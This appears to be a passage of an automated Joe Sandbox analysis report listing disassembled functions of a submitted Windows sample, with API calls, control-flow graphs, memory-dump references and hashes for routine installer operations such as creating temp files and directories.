                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                    • String ID: %s%S.dll$UXTHEME
                                                                                                                                    • API String ID: 2200240437-1106614640
                                                                                                                                    • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                                                                    • Instruction ID: a217f45d9ff01499786c61cea798a126a457230594f844882b590dd92c6ddc53
                                                                                                                                    • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                                                                    • Instruction Fuzzy Hash: 69F0F671501219A6CF14BB68DD0DF9B376CAB40304F21447AA646F20E0EB789B69CBA8
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00406076 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 485 406076-406082 486 406083-4060b7 GetTickCount GetTempFileNameW 485->486 487 4060c6-4060c8 486->487 488 4060b9-4060bb 486->488 489 4060c0-4060c3 487->489 488->486 490 4060bd 488->490 490->489
                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00406094
                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403530,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C), ref: 004060AF
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                    • API String ID: 1716503409-678247507
                                                                                                                                    • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                                                                    • Instruction ID: 86e06e500a6970b3bc5bd370241205c1b86a0a172d82c816bfbfc8c597d973d5
                                                                                                                                    • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                                                                    • Instruction Fuzzy Hash: 65F09076B50204FBEB10CF69ED05F9EB7ACEB95750F11803AED05F7240E6B099548768
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004015C6 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 491 4015c6-4015da call 402dab call 405ed1 496 401636-401639 491->496 497 4015dc-4015ef call 405e53 491->497 499 401668-4022fb call 401423 496->499 500 40163b-40165a call 401423 call 406557 SetCurrentDirectoryW 496->500 505 4015f1-4015f4 497->505 506 401609-40160c call 405b05 497->506 514 402c2f-402c3e 499->514 500->514 517 401660-401663 500->517 505->506 511 4015f6-4015fd call 405b22 505->511 515 401611-401613 506->515 511->506 521 4015ff-401607 call 405aab 511->521 518 401615-40161a 515->518 519 40162c-401634 515->519 517->514 522 401629 518->522 523 40161c-401627 GetFileAttributesW 518->523 519->496 519->497 521->515 522->519 523->519 523->522
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00405ED1: CharNextW.USER32(?,?,0042F270,?,00405F45,0042F270,0042F270,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
                                                                                                                                      • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
                                                                                                                                      • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                                                                                                      • Part of subcall function 00405AAB: CreateDirectoryW.KERNEL32(00437800,?), ref: 00405AED
                                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,00440000,?,00000000,000000F0), ref: 00401652
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1892508949-0
                                                                                                                                    • Opcode ID: 17db5344e59f9fcfaa0a8c6f5cb64453528f6d3e60a55d917771fd137aa83741
                                                                                                                                    • Instruction ID: 6fd3d265dcb44280b24f8e6f21651466162e19908bb00ba525d5af3adea1cd3c
                                                                                                                                    • Opcode Fuzzy Hash: 17db5344e59f9fcfaa0a8c6f5cb64453528f6d3e60a55d917771fd137aa83741
                                                                                                                                    • Instruction Fuzzy Hash: F211E231404104ABCF206FA5CD0159F36B0EF04368B25493FE945B22F1DA3D4A81DA5E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 527 401389-40138e 528 4013fa-4013fc 527->528 529 401390-4013a0 528->529 530 4013fe 528->530 529->530 532 4013a2-4013a3 call 401434 529->532 531 401400-401401 530->531 534 4013a8-4013ad 532->534 535 401404-401409 534->535 536 4013af-4013b7 call 40136d 534->536 535->531 539 4013b9-4013bb 536->539 540 4013bd-4013c2 536->540 541 4013c4-4013c9 539->541 540->541 541->528 542 4013cb-4013f4 MulDiv SendMessageW 541->542 542->528
                                                                                                                                    APIs
                                                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                    • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                    • Opcode ID: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                                                                                                                    • Instruction ID: 0adee223d2b7ba7d815a442a2885e1f2b60e3b86eb1a18037e9b6c54a102055c
                                                                                                                                    • Opcode Fuzzy Hash: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                                                                                                                    • Instruction Fuzzy Hash: 0E01FF31620220AFE7195B389E05B6B3698E710329F10863FF851F62F1EA78DC429B4C
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00405B3A Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 543 405b3a-405b6b CreateProcessW 544 405b79-405b7a 543->544 545 405b6d-405b76 CloseHandle 543->545 545->544
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3712363035-0
                                                                                                                                    • Opcode ID: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                                                                                                                    • Instruction ID: b1032d8704f3223f2a9afbe03a7757fefc60a77e8ecf1711bb84520e71ece662
                                                                                                                                    • Opcode Fuzzy Hash: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                                                                                                                    • Instruction Fuzzy Hash: 91E09AB4600219BFEB109B74AD06F7B767CE704604F408475BD15E2151D774A8158A78
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040694B Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 546 40694b-406965 GetModuleHandleA 547 406971-40697e GetProcAddress 546->547 548 406967-406968 call 4068db 546->548 549 406982-406984 547->549 551 40696d-40696f 548->551 551->547 552 406980 551->552 552->549
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                                                                                                                      • Part of subcall function 004068DB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                                                                                                                      • Part of subcall function 004068DB: wsprintfW.USER32 ref: 0040692D
                                                                                                                                      • Part of subcall function 004068DB: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406941
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2547128583-0
                                                                                                                                    • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                                                                                    • Instruction ID: ff64ee7455e026c1647d72c339307a336527f79dacb59e64982fca04d7429b22
                                                                                                                                    • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                                                                                    • Instruction Fuzzy Hash: 38E08673504210AFD61057705D04D27B3A89F85740302443EF946F2140DB34DC32ABA9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00406047 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 553 406047-406073 GetFileAttributesW CreateFileW
                                                                                                                                    APIs
                                                                                                                                    • GetFileAttributesW.KERNELBASE(00000003,004030C2,00442800,80000000,00000003), ref: 0040604B
                                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 415043291-0
                                                                                                                                    • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                                                                    • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                                                                                                    • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                                                                    • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00406022 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 554 406022-406032 GetFileAttributesW 555 406041-406044 554->555 556 406034-40603b SetFileAttributesW 554->556 556->555
                                                                                                                                    APIs
                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 0040603B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AttributesFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                    • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                                                                    • Instruction ID: 97cbb32404f08d1f6fed837f871d2b37f55cf766f9720be9b575451f5cdabe77
                                                                                                                                    • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                                                                    • Instruction Fuzzy Hash: A3D0C972504220AFC2102728AE0889BBB55EB542717028A35FCA9A22B0CB304CA68694
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00405B05 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 557 405b05-405b13 CreateDirectoryW 558 405b15-405b17 557->558 559 405b19 GetLastError 557->559 560 405b1f 558->560 559->560
                                                                                                                                    APIs
                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
                                                                                                                                    • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B19
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1375471231-0
                                                                                                                                    • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                                                                    • Instruction ID: 8c4969e502f5bc4c8dfdefb7e9c2ba363b64d1215f12130c86bef4ebeef6f559
                                                                                                                                    • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                                                                    • Instruction Fuzzy Hash: 19C08C30310902DACA802B209F087173960AB80340F158439A683E00B4CA30A065C92D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004060CA Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E7,00000000,00000000,0040330B,000000FF,00000004,00000000,00000000,00000000), ref: 004060DE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileRead
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                    • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                                                                    • Instruction ID: a77d82ba430c16999eb1f2306cb11816df14181100402a9e04059793f1b3015d
                                                                                                                                    • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                                                                    • Instruction Fuzzy Hash: 21E08632150219ABCF10DF948C00EEB3B9CFF04390F018436FD11E3040D630E92197A4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004060F9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040349D,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 0040610D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                    • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                                    • Instruction ID: 78408803ccc59d93ae5352641a5e7b8f709900c8df5e8e9e13d69f82a1dcf02f
                                                                                                                                    • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                                    • Instruction Fuzzy Hash: 8FE08C3220021ABBCF109E908C00EEB3FACEB003A0F014432FA26E6050D670E83097A4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004034EA Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034F8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
